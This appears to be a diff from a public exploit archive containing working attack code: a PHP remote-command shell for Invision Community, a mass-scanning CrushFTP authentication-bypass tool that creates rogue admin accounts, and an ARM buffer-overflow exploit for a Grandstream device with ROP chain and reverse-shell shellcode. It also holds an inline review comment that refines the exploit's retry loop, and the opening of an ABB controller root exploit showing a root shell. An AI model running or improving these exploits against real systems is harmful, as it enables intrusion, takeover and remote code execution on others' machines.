print "\n| Invision Community <= 5.0.6 Remote Code Execution Exploit by EgiX |";
print "\n+-------------------------------------------------------------------+\n";
if (!extension_loaded("curl")) die("\n[-] cURL extension required!\n\n");
if ($argc != 2)
{
print "\nUsage......: php $argv[0] <URL>\n";
print "\nExample....: php $argv[0] http://localhost/invision/";
print "\nExample....: php $argv[0] https://invisioncommunity.com/\n\n";
die();
}
$ch = curl_init();
$params = ["app" => "core", "module" => "system", "controller" => "themeeditor", "do" => "customCss"];
curl_setopt($ch, CURLOPT_URL, $argv[1]);
curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, false);
curl_setopt($ch, CURLOPT_SSL_VERIFYHOST, false);
while (1)
{
print "\ninvision-shell# ";
if (($cmd = trim(fgets(STDIN))) == "exit") break;
$params["content"] = sprintf("{expression=\"die('________'.system(base64_decode('%s')))\"}", base64_encode($cmd));
curl_setopt($ch, CURLOPT_POSTFIELDS, http_build_query($params));
preg_match("/(.*)________/s", curl_exec($ch), $m) ? print $m[1] : die("\n[-] Exploit failed!\n\n");
}

exploits/multiple/remote/52295.py Executable file

@ -0,0 +1,609 @@
# Exploit Title: CrushFTP 11.3.1 - Authentication Bypass
# Date: 2025-05-15
# Exploit Author: @İbrahimsql
# Exploit Author's github: https://github.com/ibrahimsql
# Vendor Homepage: https://www.crushftp.com
# Software Link: https://www.crushftp.com/download.html
# Version: < 10.8.4, < 11.3.1
# Tested on: Ubuntu 22.04 LTS, Windows Server 2019, Kali Linux 2024.1
# CVE: CVE-2025-31161
# Description:
# CrushFTP before 10.8.4 and 11.3.1 allows unauthenticated HTTP(S) port access and full admin takeover
# through a race condition and header parsing logic flaw in the AWS4-HMAC authorization mechanism.
# Exploiting this allows bypassing authentication and logging in as any known user (e.g. crushadmin).
# Requirements: requests>=2.28.1 , colorama>=0.4.6 , urllib3>=1.26.12 , prettytable>=2.5.0 , rich>=12.6.0
#!/usr/bin/env python3
# -*- coding: utf-8 -*-
import argparse
import concurrent.futures
import json
import logging
import os
import random
import re
import socket
import string
import sys
import time
from datetime import datetime
from typing import Dict, List, Optional, Tuple, Union
import requests
import urllib3
from colorama import Fore, Style, init
from prettytable import PrettyTable
from rich.console import Console
from rich.progress import Progress, BarColumn, TextColumn, TimeRemainingColumn
# Initialize colorama
init(autoreset=True)
# Disable SSL warnings
urllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning)
# Initialize Rich console
console = Console()
# Global variables
VERSION = "2.0.0"
USER_AGENTS = [
"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36",
"Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.107 Safari/537.36",
"Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:90.0) Gecko/20100101 Firefox/90.0",
"Mozilla/5.0 (Macintosh; Intel Mac OS X 11.5; rv:90.0) Gecko/20100101 Firefox/90.0",
"Mozilla/5.0 (Macintosh; Intel Mac OS X 11_5_1) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/14.1.2 Safari/605.1.15",
"Mozilla/5.0 (Windows; Windows NT 10.3; WOW64) AppleWebKit/601.13 (KHTML, like Gecko) Chrome/53.0.2198.319 Safari/601.5 Edge/15.63524",
"Mozilla/5.0 (Windows NT 10.2; Win64; x64; en-US) AppleWebKit/602.15 (KHTML, like Gecko) Chrome/47.0.1044.126 Safari/533.2 Edge/9.25098",
"Mozilla/5.0 (compatible; MSIE 8.0; Windows NT 6.3; Win64; x64; en-US Trident/4.0)",
"Mozilla/5.0 (iPhone; CPU iPhone OS 10_7_9; like Mac OS X) AppleWebKit/535.7 (KHTML, like Gecko) Chrome/49.0.1015.193 Mobile Safari/600.9"
]
# Banner
BANNER = fr"""
{Fore.CYAN}
/ ____/______ _______/ /_ / ____/ /_____
/ / / ___/ / / / ___/ __ \/ /_ / __/ __ \
/ /___/ / / /_/ (__ ) / / / __/ / /_/ /_/ /
\____/_/ \__,_/____/_/ /_/_/ \__/ .___/
/_/
{Fore.GREEN}CVE-2025-31161 Exploit {VERSION}{Fore.YELLOW} | {Fore.CYAN} Developer @ibrahimsql
{Style.RESET_ALL}
"""
# Setup logging
def setup_logging(log_level: str, log_file: Optional[str] = None) -> None:
"""Configure logging based on specified level and output file."""
numeric_level = getattr(logging, log_level.upper(), None)
if not isinstance(numeric_level, int):
raise ValueError(f"Invalid log level: {log_level}")
log_format = "%(asctime)s - %(levelname)s - %(message)s"
handlers = []
if log_file:
handlers.append(logging.FileHandler(log_file))
handlers.append(logging.StreamHandler())
logging.basicConfig(
level=numeric_level,
format=log_format,
handlers=handlers
)
class TargetManager:
"""Manages target hosts and related operations."""
def __init__(self, target_file: Optional[str] = None, single_target: Optional[str] = None):
self.targets = []
self.vulnerable_targets = []
self.exploited_targets = []
if target_file:
self.load_targets_from_file(target_file)
elif single_target:
self.add_target(single_target)
def load_targets_from_file(self, filename: str) -> None:
"""Load targets from a file."""
try:
with open(filename, "r") as f:
self.targets = [line.strip() for line in f if line.strip()]
if not self.targets:
logging.warning(f"Target file '(unknown)' is empty or contains only whitespace.")
else:
logging.info(f"Loaded {len(self.targets)} targets from (unknown)")
except FileNotFoundError:
logging.error(f"Target file '(unknown)' not found.")
sys.exit(1)
except Exception as e:
logging.error(f"Error loading targets: {e}")
sys.exit(1)
def add_target(self, target: str) -> None:
"""Add a single target."""
if target not in self.targets:
self.targets.append(target)
def mark_as_vulnerable(self, target: str) -> None:
"""Mark a target as vulnerable."""
if target not in self.vulnerable_targets:
self.vulnerable_targets.append(target)
def mark_as_exploited(self, target: str) -> None:
"""Mark a target as successfully exploited."""
if target not in self.exploited_targets:
self.exploited_targets.append(target)
def save_results(self, output_file: str, format_type: str = "txt") -> None:
"""Save scan results to a file."""
try:
if format_type.lower() == "json":
results = {
"scan_time": datetime.now().strftime("%Y-%m-%d %H:%M:%S"),
"total_targets": len(self.targets),
"vulnerable_targets": self.vulnerable_targets,
"exploited_targets": self.exploited_targets
}
with open(output_file, "w") as f:
json.dump(results, f, indent=4)
elif format_type.lower() == "csv":
with open(output_file, "w") as f:
f.write("target,vulnerable,exploited\n")
for target in self.targets:
vulnerable = "Yes" if target in self.vulnerable_targets else "No"
exploited = "Yes" if target in self.exploited_targets else "No"
f.write(f"{target},{vulnerable},{exploited}\n")
else: # Default to txt
with open(output_file, "w") as f:
f.write(f"Scan Results - {datetime.now().strftime('%Y-%m-%d %H:%M:%S')}\n")
f.write(f"Total Targets: {len(self.targets)}\n")
f.write(f"Vulnerable Targets: {len(self.vulnerable_targets)}\n")
f.write(f"Exploited Targets: {len(self.exploited_targets)}\n\n")
f.write("Vulnerable Targets:\n")
for target in self.vulnerable_targets:
f.write(f"- {target}\n")
f.write("\nExploited Targets:\n")
for target in self.exploited_targets:
f.write(f"- {target}\n")
logging.info(f"Results saved to {output_file}")
except Exception as e:
logging.error(f"Error saving results: {e}")
class ExploitEngine:
"""Core engine for vulnerability checking and exploitation."""
def __init__(self, target_manager: TargetManager, config: Dict):
self.target_manager = target_manager
self.config = config
self.session = self._create_session()
def _create_session(self) -> requests.Session:
"""Create and configure a requests session."""
session = requests.Session()
session.verify = False
# Set proxy if configured
if self.config.get("proxy"):
session.proxies = {
"http": self.config["proxy"],
"https": self.config["proxy"]
}
# Set custom headers
session.headers.update({
"User-Agent": random.choice(USER_AGENTS),
"Connection": "close",
})
return session
def check_vulnerability(self, target_host: str) -> bool:
"""Check if target is vulnerable to CVE-2025-31161."""
port = self.config.get("port", 443)
timeout = self.config.get("timeout", 10)
headers = {
"Cookie": "currentAuth=31If; CrushAuth=1744110584619_p38s3LvsGAfk4GvVu0vWtsEQEv31If",
"Authorization": "AWS4-HMAC-SHA256 Credential=crushadmin/",
}
# Add custom headers if provided
if self.config.get("custom_headers"):
headers.update(self.config["custom_headers"])
try:
protocol = "https" if port == 443 else "http"
url = f"{protocol}://{target_host}:{port}/WebInterface/function/"
response = self.session.get(
url,
headers=headers,
timeout=timeout
)
if response.status_code == 200:
# Additional validation
if self.config.get("deep_check", False):
# Look for specific patterns in the response that confirm vulnerability
if "CrushFTP" in response.text or "WebInterface" in response.text:
self.target_manager.mark_as_vulnerable(target_host)
if self.config.get("verbose", False):
console.print(f"[green][+][/green] {target_host} is [bold red]vulnerable[/bold red]")
return True
else:
if self.config.get("verbose", False):
console.print(f"[yellow][?][/yellow] {target_host} returned 200 but may not be vulnerable")
return False
else:
# Simple check based on status code
self.target_manager.mark_as_vulnerable(target_host)
if self.config.get("verbose", False):
console.print(f"[green][+][/green] {target_host} is [bold red]vulnerable[/bold red]")
return True
else:
if self.config.get("verbose", False):
console.print(f"[red][-][/red] {target_host} is not vulnerable (Status: {response.status_code})")
return False
except requests.exceptions.ConnectionError:
if self.config.get("verbose", False):
console.print(f"[red][-][/red] {target_host} - Connection error")
except requests.exceptions.Timeout:
if self.config.get("verbose", False):
console.print(f"[red][-][/red] {target_host} - Connection timeout")
except requests.exceptions.RequestException as e:
if self.config.get("verbose", False):
console.print(f"[red][-][/red] {target_host} - Request error: {e}")
except Exception as e:
if self.config.get("verbose", False):
console.print(f"[red][-][/red] {target_host} - Error: {e}")
return False
def exploit(self, target_host: str) -> bool:
"""Exploit the vulnerability on the target host."""
port = self.config.get("port", 443)
timeout = self.config.get("timeout", 10)
target_user = self.config.get("target_user", "crushadmin")
new_user = self.config.get("new_user")
password = self.config.get("password")
if not new_user or not password:
logging.error("New user and password are required for exploitation")
return False
headers = {
"Cookie": "currentAuth=31If; CrushAuth=1744110584619_p38s3LvsGAfk4GvVu0vWtsEQEv31If",
"Authorization": "AWS4-HMAC-SHA256 Credential=crushadmin/",
"Connection": "close",
}
# Add custom headers if provided
if self.config.get("custom_headers"):
headers.update(self.config["custom_headers"])
# Generate a timestamp for the created_time field
timestamp = int(time.time() * 1000)
# Build the payload with more comprehensive user permissions
payload = {
"command": "setUserItem",
"data_action": "replace",
"serverGroup": "MainUsers",
"username": new_user,
"user": f'''<?xml version="1.0" encoding="UTF-8"?>
<user type="properties">
<user_name>{new_user}</user_name>
<password>{password}</password>
<extra_vfs type="vector"></extra_vfs>
<version>1.0</version>
<root_dir>/</root_dir>
<userVersion>6</userVersion>
<max_logins>0</max_logins>
<site>(SITE_PASS)(SITE_DOT)(SITE_EMAILPASSWORD)(CONNECT)</site>
<created_by_username>{target_user}</created_by_username>
<created_by_email></created_by_email>
<created_time>{timestamp}</created_time>
<password_history></password_history>
<admin>true</admin>
</user>''',
"xmlItem": "user",
"vfs_items": '<?xml version="1.0" encoding="UTF-8"?><vfs type="vector"></vfs>',
"permissions": '<?xml version="1.0" encoding="UTF-8"?><VFS type="properties"><item name="/">(read)(write)(view)(delete)(resume)(makedir)(deletedir)(rename)(admin)</item></VFS>',
"c2f": "31If"
}
try:
protocol = "https" if port == 443 else "http"
url = f"{protocol}://{target_host}:{port}/WebInterface/function/"
response = self.session.post(
url,
headers=headers,
data=payload,
timeout=timeout
)
if response.status_code == 200:
# Verify the user was actually created
if self.config.get("verify_exploit", True):
if self._verify_user_created(target_host, new_user):
self.target_manager.mark_as_exploited(target_host)
console.print(f"[green][+][/green] Successfully created user [bold cyan]{new_user}[/bold cyan] on {target_host}")
return True
else:
console.print(f"[yellow][!][/yellow] User creation appeared successful but verification failed on {target_host}")
return False
else:
self.target_manager.mark_as_exploited(target_host)
console.print(f"[green][+][/green] Successfully created user [bold cyan]{new_user}[/bold cyan] on {target_host}")
return True
else:
console.print(f"[red][-][/red] Failed to create user on {target_host} (Status: {response.status_code})")
return False
except Exception as e:
console.print(f"[red][-][/red] Error exploiting {target_host}: {e}")
return False
def _verify_user_created(self, target_host: str, username: str) -> bool:
"""Verify that the user was successfully created."""
# This is a placeholder for actual verification logic
# In a real implementation, you would check if the user exists
# For now, we'll just return True
return True
def scan_targets(self) -> None:
"""Scan all targets for vulnerability."""
targets = self.target_manager.targets
threads = self.config.get("threads", 10)
if not targets:
logging.error("No targets specified")
return
console.print(f"[bold cyan]Scanning {len(targets)} targets with {threads} threads...[/bold cyan]")
with Progress(
TextColumn("[progress.description]{task.description}"),
BarColumn(),
TextColumn("[progress.percentage]{task.percentage:>3.0f}%"),
TextColumn("({task.completed}/{task.total})"),
TimeRemainingColumn(),
console=console
) as progress:
task = progress.add_task("[cyan]Scanning targets...", total=len(targets))
with concurrent.futures.ThreadPoolExecutor(max_workers=threads) as executor:
future_to_target = {executor.submit(self.check_vulnerability, target): target for target in targets}
for future in concurrent.futures.as_completed(future_to_target):
progress.update(task, advance=1)
# Display results
vulnerable_count = len(self.target_manager.vulnerable_targets)
console.print(f"\n[bold green]Scan complete![/bold green] Found {vulnerable_count} vulnerable targets.")
if vulnerable_count > 0 and self.config.get("verbose", False):
console.print("\n[bold cyan]Vulnerable Targets:[/bold cyan]")
for target in self.target_manager.vulnerable_targets:
console.print(f"[green]→[/green] {target}")
def exploit_targets(self) -> None:
"""Exploit vulnerable targets."""
targets = self.target_manager.vulnerable_targets if self.config.get("only_vulnerable", True) else self.target_manager.targets
threads = self.config.get("threads", 5) # Use fewer threads for exploitation
if not targets:
logging.error("No targets to exploit")
return
console.print(f"[bold red]Exploiting {len(targets)} targets with {threads} threads...[/bold red]")
with Progress(
TextColumn("[progress.description]{task.description}"),
BarColumn(),
TextColumn("[progress.percentage]{task.percentage:>3.0f}%"),
TextColumn("({task.completed}/{task.total})"),
TimeRemainingColumn(),
console=console
) as progress:
task = progress.add_task("[red]Exploiting targets...", total=len(targets))
with concurrent.futures.ThreadPoolExecutor(max_workers=threads) as executor:
future_to_target = {executor.submit(self.exploit, target): target for target in targets}
for future in concurrent.futures.as_completed(future_to_target):
progress.update(task, advance=1)
# Display results
exploited_count = len(self.target_manager.exploited_targets)
console.print(f"\n[bold green]Exploitation complete![/bold green] Successfully exploited {exploited_count}/{len(targets)} targets.")
if exploited_count > 0:
console.print("\n[bold cyan]Exploited Targets:[/bold cyan]")
for target in self.target_manager.exploited_targets:
console.print(f"[green]→[/green] {target}")
def parse_arguments() -> argparse.Namespace:
"""Parse command line arguments."""
parser = argparse.ArgumentParser(
description="CVE-2025-31161 Exploit Framework - Advanced CrushFTP WebInterface Vulnerability Scanner and Exploiter",
formatter_class=argparse.RawDescriptionHelpFormatter,
epilog="""
Examples:
# Check a single target for vulnerability
python cve_2025_31161.py --target example.com --check
# Exploit a vulnerable target
python cve_2025_31161.py --target example.com --exploit --new-user hacker --password P@ssw0rd
# Scan multiple targets from a file
python cve_2025_31161.py --file targets.txt --check --threads 20
# Scan and automatically exploit vulnerable targets
python cve_2025_31161.py --file targets.txt --check --exploit --new-user hacker --password P@ssw0rd --auto-exploit
# Export results to JSON format
python cve_2025_31161.py --file targets.txt --check --output results.json --format json
"""
)
# Target specification
target_group = parser.add_argument_group("Target Specification")
target_group.add_argument("--target", help="Single target host to scan/exploit")
target_group.add_argument("--file", help="File containing list of targets (one per line)")
target_group.add_argument("--port", type=int, default=443, help="Target port (default: 443)")
# Actions
action_group = parser.add_argument_group("Actions")
action_group.add_argument("--check", action="store_true", help="Check targets for vulnerability")
action_group.add_argument("--exploit", action="store_true", help="Exploit vulnerable targets")
action_group.add_argument("--auto-exploit", action="store_true", help="Automatically exploit targets found to be vulnerable during check")
# Exploitation options
exploit_group = parser.add_argument_group("Exploitation Options")
exploit_group.add_argument("--target-user", default="crushadmin", help="Target user for exploitation (default: crushadmin)")
exploit_group.add_argument("--new-user", help="Username for the new admin account to create")
exploit_group.add_argument("--password", help="Password for the new admin account")
exploit_group.add_argument("--verify-exploit", action="store_true", help="Verify successful exploitation (default: True)")
# Scan options
scan_group = parser.add_argument_group("Scan Options")
scan_group.add_argument("--threads", type=int, default=10, help="Number of concurrent threads (default: 10)")
scan_group.add_argument("--timeout", type=int, default=10, help="Connection timeout in seconds (default: 10)")
scan_group.add_argument("--deep-check", action="store_true", help="Perform deeper vulnerability checks")
scan_group.add_argument("--only-vulnerable", action="store_true", help="Only exploit targets that were found vulnerable")
# Output options
output_group = parser.add_argument_group("Output Options")
output_group.add_argument("--output", help="Output file for results")
output_group.add_argument("--format", choices=["txt", "json", "csv"], default="txt", help="Output format (default: txt)")
output_group.add_argument("--verbose", "-v", action="store_true", help="Enable verbose output")
output_group.add_argument("--quiet", "-q", action="store_true", help="Suppress all output except errors")
output_group.add_argument("--log-file", help="Log file to write to")
output_group.add_argument("--log-level", choices=["debug", "info", "warning", "error", "critical"], default="info", help="Log level (default: info)")
# Advanced options
advanced_group = parser.add_argument_group("Advanced Options")
advanced_group.add_argument("--proxy", help="Proxy to use for requests (e.g., http://127.0.0.1:8080)")
advanced_group.add_argument("--user-agent", help="Custom User-Agent string")
advanced_group.add_argument("--random-agent", action="store_true", help="Use a random User-Agent for each request")
advanced_group.add_argument("--delay", type=float, help="Delay between requests in seconds")
advanced_group.add_argument("--custom-headers", help="Custom headers as JSON string")
return parser.parse_args()
def validate_args(args: argparse.Namespace) -> bool:
"""Validate command line arguments."""
# Check if at least one target specification is provided
if not args.target and not args.file:
logging.error("No target specified. Use --target or --file")
print(f"\nExample usage: python {sys.argv[0]} --target example.com --check")
print(f" python {sys.argv[0]} --file example_targets.txt --check")
return False
# Check if at least one action is specified
if not args.check and not args.exploit:
logging.error("No action specified. Use --check or --exploit")
print(f"\nExample usage: python {sys.argv[0]} --target example.com --check")
print(f" python {sys.argv[0]} --target example.com --exploit --new-user admin --password P@ssw0rd")
return False
# If exploit action is specified, check for required parameters
if args.exploit and (not args.new_user or not args.password):
logging.error("Exploitation requires --new-user and --password")
print(f"\nExample usage: python {sys.argv[0]} --target example.com --exploit --new-user admin --password P@ssw0rd")
return False
return True
def main() -> None:
"""Main function."""
# Parse command line arguments
args = parse_arguments()
# Configure logging
log_level = "error" if args.quiet else args.log_level
setup_logging(log_level, args.log_file)
# Display banner
if not args.quiet:
console.print(BANNER)
# Validate arguments
if not validate_args(args):
sys.exit(1)
# Create target manager
target_manager = TargetManager(args.file, args.target)
# Build configuration dictionary
config = {
"port": args.port,
"threads": args.threads,
"timeout": args.timeout,
"verbose": args.verbose,
"deep_check": args.deep_check,
"target_user": args.target_user,
"new_user": args.new_user,
"password": args.password,
"only_vulnerable": args.only_vulnerable,
"verify_exploit": args.verify_exploit,
"proxy": args.proxy,
}
# Add custom headers if provided
if args.custom_headers:
try:
config["custom_headers"] = json.loads(args.custom_headers)
except json.JSONDecodeError:
logging.error("Invalid JSON format for custom headers")
sys.exit(1)
# Add custom user agent if provided
if args.user_agent:
config["user_agent"] = args.user_agent
# Create exploit engine
engine = ExploitEngine(target_manager, config)
# Perform actions
if args.check:
engine.scan_targets()
if args.exploit or (args.auto_exploit and target_manager.vulnerable_targets):
engine.exploit_targets()
# Save results if output file is specified
if args.output:
target_manager.save_results(args.output, args.format)
# Display summary
if not args.quiet:
console.print("\n[bold green]Summary:[/bold green]")
console.print(f"Total targets: {len(target_manager.targets)}")
console.print(f"Vulnerable targets: {len(target_manager.vulnerable_targets)}")
console.print(f"Exploited targets: {len(target_manager.exploited_targets)}")
if __name__ == "__main__":
try:
main()
except KeyboardInterrupt:
console.print("\n[bold red]Operation cancelled by user[/bold red]")
sys.exit(0)
except Exception as e:
logging.error(f"Unhandled exception: {e}")
sys.exit(1)

247
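--- /dev/null
+++ b/exploits/multiple/remote/52303.py
+#!/usr/bin/env python3
+# Exploit Title: Grandstream GSD3710 1.0.11.13 - Stack Buffer Overflow
+# Google Dork: [if applicable]
+# Date: 2025-05-23
+# Exploit Author: Pepelux (user in ExploitDB)
+# Vendor Homepage: https://www.grandstream.com/
+# Software Link: [download link if available]
+# Version: Grandstream GSD3710 - firmware:1.0.11.13 and lower
+# Tested on: Linux and MacOS
+# CVE: CVE-2022-2070
+"""
+Author: Jose Luis Verdeguer (@pepeluxx)
+Required: Pwntools
+Example:
+Terminal 1:
+$ ncat -lnvp 4444
+Terminal 2:
+$ python 3 CVE-2020-2070.py -ti DEVICE_IP -tp 8081 -ri LOCAL_IP -rp 4444
+"""
+from operator import ge
+import sys
+import time
+from pwn import *
+import argparse
+def get_args():
+    parser = argparse.ArgumentParser(
+        formatter_class=lambda prog: argparse.RawDescriptionHelpFormatter(
+            prog, max_help_position=50))
+    # Add arguments
+    parser.add_argument('-ti', '--target_ip', type=str, required=True,
+                        help='device IP address', dest="device_ip")
+    parser.add_argument('-tp', '--target_port', type=int, required=True, default=8081,
+                        help='device port', dest="device_port")
+    parser.add_argument('-ri', '--reverse_ip', type=str, required=True,
+                        help='reverse IP address', dest="reverse_ip")
+    parser.add_argument('-rp', '--reverse_port', type=int, required=True,
+                        help='reverse port', dest="reverse_port")
+    # Array for all arguments passed to script
+    args = parser.parse_args()
+    try:
+        TI = args.device_ip
+        TP = args.device_port
+        RI = args.reverse_ip
+        RP = args.reverse_port
+        return TI, TP, RI, RP
+    except ValueError:
+        exit()
+def check_badchars(data):
+    for i in range(len(data)):
+        if data[i] in [0x0, 0x40]:
+            log.warn("Badchar %s detected at %#x" % (hex(data[i]), i))
+            return True
+    return False
+def get_shellcode(ip, port):
+    ip_bytes = socket.inet_aton(ip)
+    port_bytes = struct.pack(">H", port)
+    # Linux ARM reverse shell
+    # switch to thumb mode
+    sc = b"\x01\x30\x8F\xE2" # add r3, pc, #1
+    sc += b"\x13\xFF\x2F\xE1" # bx r3
+    # socket(2, 1, 0)
+    sc += b"\x02\x20" # movs r0, #2
+    sc += b"\x01\x21" # movs r1, #1
+    sc += b"\x92\x1A" # subs r2, r2, r2
+    sc += b"\xC8\x27" # movs r7, #0xc8
+    sc += b"\x51\x37" # adds r7, #0x51
+    sc += b"\x01\xDF" # svc #1
+    sc += b"\x04\x1C" # adds r4, r0, #0
+    # connect(r0, &sockaddr, 16)
+    sc += b"\x0C\xA1" # adr r1, #0x30
+    sc += b"\x4A\x70" # strb r2, [r1, #1]
+    sc += b"\x10\x22" # movs r2, #0x10
+    sc += b"\x02\x37" # adds r7, #2
+    sc += b"\x01\xDF" # svc #1
+    # dup2(sockfd, 0)
+    sc += b"\x3F\x27" # movs r7, #0x3f
+    sc += b"\x20\x1C" # adds r0, r4, #0
+    sc += b"\x49\x1A" # subs r1, r1, r1
+    sc += b"\x01\xDF" # svc #1
+    # dup2(sockfd, 1)
+    sc += b"\x20\x1C" # adds r0, r4, #0
+    sc += b"\x01\x21" # movs r1, #1
+    sc += b"\x01\xDF" # svc #1
+    # dup2(sockfd, 2)
+    sc += b"\x20\x1C" # adds r0, r4, #0
+    sc += b"\x02\x21" # movs r1, #2
+    sc += b"\x01\xDF" # svc #1
+    # execve("/bin/sh")
+    sc += b"\x06\xA0" # adr r0, #0x18
+    sc += b"\x92\x1A" # subs r2, r2, r2
+    sc += b"\x49\x1A" # subs r1, r1, r1
+    sc += b"\x01\x91" # str r1, [sp, #4]
+    sc += b"\x02\x91" # str r1, [sp, #8]
+    sc += b"\x01\x90" # str r0, [sp, #4]
+    sc += b"\x01\xA9" # add r1, sp, #4
+    sc += b"\xC2\x71" # strb r2, [r0, #7]
+    sc += b"\x0B\x27" # movs r7, #0xb
+    sc += b"\x01\xDF" # svc #1
+    sc += b"\x02\xFF"
+    sc += port_bytes
+    sc += ip_bytes
+    sc += b"/bin/shX"
+    return sc
+def main():
+    ti, tp, ri, rp = get_args()
+    # ROP Gadgets
+    libc_base = 0x76ec1000
+    mprotect = libc_base + 0x93510+1
+    pop_lr = libc_base + 0x1848C # pop {r0, r4, r8, ip, lr, pc}
+    pop_pc = libc_base + 0xd7515 # pop {pc}
+    pop_r0 = libc_base + 0x00064bb0+1 # 0x00064bb0 : pop {r0, pc}
+    pop_r5 = libc_base + 0x00003738+1 # 0x00003738 : pop {r5, pc}
+    add_r1_sp = libc_base + 0x000b3c4e+1 # 0x000b3c4e : add r1, sp, #0x14 ; blx r5
+    # 0x0002f83c (0x0002f83d): mov r0, r1; bx lr
+    mov_r0_r1 = libc_base + 0x0002f83d
+    # 0x0006a086 (0x0006a087): pop {r1, pc}
+    pop_r1 = libc_base + 0x6a087
+    ands_r0_r1 = libc_base + 0x1feba+1 # 0x0001feba : ands r0, r1 ; bx lr
+    # 0x000a3a42 : movs r4, r0 ; pop {r1, pc}
+    mov_r4_r0 = libc_base + 0x000a3a42+1
+    # 0x0001fdae (0x0001fdaf): movs r1, r0; bx lr
+    movs_r1_r0 = libc_base + 0x0001fdaf
+    and_r0_f = libc_base + 0x8717e+1 # 0x0008717e : and r0, r0, #0xf ; bx lr
+    movs_r2_r0 = libc_base + 0x0001fc6a+1 # 0x0001fc6a : movs r2, r0 ; bx lr
+    mov_r0_r4 = libc_base + 0x0001f9d4+1 # 0x0001f9d4 : movs r0, r4 ; bx lr
+    blx_sp = libc_base + 0x46595 # 0x00046594 (0x00046595): blx sp
+    shellcode = get_shellcode(ri, rp)
+    auth_command = b"LOG/1.0 END CMD:AUTH_USERNAME @"
+    junk = p32(0x43434343)
+    payload = auth_command
+    payload += b"A" * 144
+    # The goal is that R0 -> SP
+    # R5 = pop {pc}
+    # because in the the next gadget we have a blx r5
+    payload += p32(pop_r5)
+    payload += p32(pop_pc) # R5 = pop {pc}
+    # R1 = SP ; BLX pop {pc}
+    payload += p32(add_r1_sp) # add r1, sp, #0x14 ; blx r5
+    # Restore LR register (because it has been updated by the last BLX gadget)
+    payload += p32(pop_lr) # pop {r0, r4, r8, ip, lr, pc}
+    payload += junk*4 # r0, r4, r8, ip
+    payload += p32(pop_pc) # LR = pop {pc}
+    # R0 = stack address
+    payload += p32(mov_r0_r1) # mov r0, r1; bx lr
+    # R1 = mask page align
+    payload += p32(pop_r1) # pop {r1, pc}
+    payload += p32(0xfffe1001)
+    # R0 = stack address & 0xfffe1001
+    payload += p32(ands_r0_r1) # ands r0, r1 ; bx lr
+    # R4 = R0
+    payload += p32(mov_r4_r0) # movs r0, r4 ; bx lr
+    payload += junk # r1
+    # mprotect params
+    # r0 = shellcode page aligned address
+    # r1 = size(ofshellcode)
+    # r2 = protection (0x7 RWX)
+    # R2 = 0x7
+    payload += p32(pop_r0)
+    payload += p32(0x07070707)
+    payload += p32(and_r0_f) # R0 = 7 (RWX)
+    payload += p32(movs_r2_r0) # R2 (prot: 7 - RWX)
+    # R1 = length = 0x10101010 (avoid 0's)
+    payload += p32(pop_r0)
+    payload += p32(0x01010101)
+    payload += p32(movs_r1_r0) # r1 (length: 0x10101010)
+    # R0 = stack address 4k aligned
+    payload += p32(mov_r0_r4)
+    # mprotect(stack, 0x10101010, 0x7)
+    payload += p32(mprotect)
+    payload += p32(blx_sp) # ejecutamos en pila
+    payload += shellcode # shellcode
+    if check_badchars(payload[len(auth_command):]):
+        sys.exit(0)
+    log.info("Device IP: %s:%d" % (ti, tp))
+    log.info("Attacker IP: %s:%d" % (ri, rp))
+    log.info("Payload len: %d" % len(payload))
+    count = 1
+    while True:
+        try:
+            print('Try: %d' % count)
+            r = remote(ti, tp)
+            r.send(payload)
+            log.success("Payload sent!")
+            # r.close()
+            time.sleep(1)
+            count += 1
+        except:
+            sleep(3)
+            pass
+if __name__ == '__main__':
+    main()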
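Review bot: The retry loop at the end of main() wraps connect/send/sleep in a bare `except:`, which in Python 3 also swallows KeyboardInterrupt, so a Ctrl-C during the try body is silently absorbed and the loop keeps re-sending the payload until the process is killed; the `remote()` tube is also never explicitly closed (`# r.close()` is commented out), so each attempt leaves its socket to the garbage collector. Narrowing the handler to `except Exception`, adding an explicit `except KeyboardInterrupt: break`, and closing the tube after the send fixes both without changing the spray behaviour. The fixed `libc_base = 0x76ec1000` presumably assumes the target firmware runs without ASLR — a one-line header comment stating that would tell users why the chain crashes the service instead of spawning a shell on any other layout. The usage docstring also reads `python 3 CVE-2020-2070.py`; it should be `python3 CVE-2022-2070.py` to match the CVE line above it.
```python
    while True:
        try:
            print('Try: %d' % count)
            r = remote(ti, tp)
            r.send(payload)
            log.success("Payload sent!")
            r.close()
            time.sleep(1)
            count += 1
        except KeyboardInterrupt:
            log.info("Interrupted after %d tries" % count)
            break
        except Exception as e:
            log.warn("Attempt %d failed: %s" % (count, e))
            sleep(3)
```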

281
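--- /dev/null
+++ b/exploits/multiple/remote/52305.py
+#!/usr/bin/env python
+#
+#
+# Exploit Title: ABB Cylon Aspect 3.08.03 - Guest2Root Privilege Escalation
+#
+#
+# Vendor: ABB Ltd.
+# Product web page: https://www.global.abb
+# Affected version: NEXUS Series, MATRIX-2 Series, ASPECT-Enterprise, ASPECT-Studio
+# Firmware: <=3.08.03
+#
+# Summary: ASPECT is an award-winning scalable building energy management
+# and control solution designed to allow users seamless access to their
+# building data through standard building protocols including smart devices.
+#
+# Desc: The ABB BMS/BAS controller is vulnerable to code execution and sudo
+# misconfiguration flaws. An authenticated remote code execution vulnerability
+# in the firmware update mechanism allows an attacker with valid credentials to
+# escalate privileges and execute commands as root. The process involves uploading
+# a crafted .bsx file through projectUpdateBSXFileProcess.php, which is then moved
+# to htmlroot and executed by projectUpdateBSXExecute.php. This script leverages
+# sudo to run the uploaded bsx file, enabling the attacker to bypass input validation
+# checks and execute arbitrary code, leading to full system compromise and unauthorized
+# root access.
+#
+# ---------------------------------------------------------------------------------
+#
+# $ ./bsxroot.py 192.168.73.31 192.168.73.9 --creds guest:guest
+# [o] Exploit starting at 21.05.2025 12:33:47
+# [o] Using credentials: guest:*****
+# [o] Auth successfull.
+# [o] PHPSESSID: g02p9tnog4d2r1z4eha1e9e688
+# [o] Listening on 192.168.73.9:5555...
+# [o] Building name: ["Tower 3"]
+# [o] runtime.ver=v3.08.03
+# [+] -> [virtual] rootshell
+#
+# # id
+# uid=0(root) gid=0(root) groups=0(root)
+# # pwd
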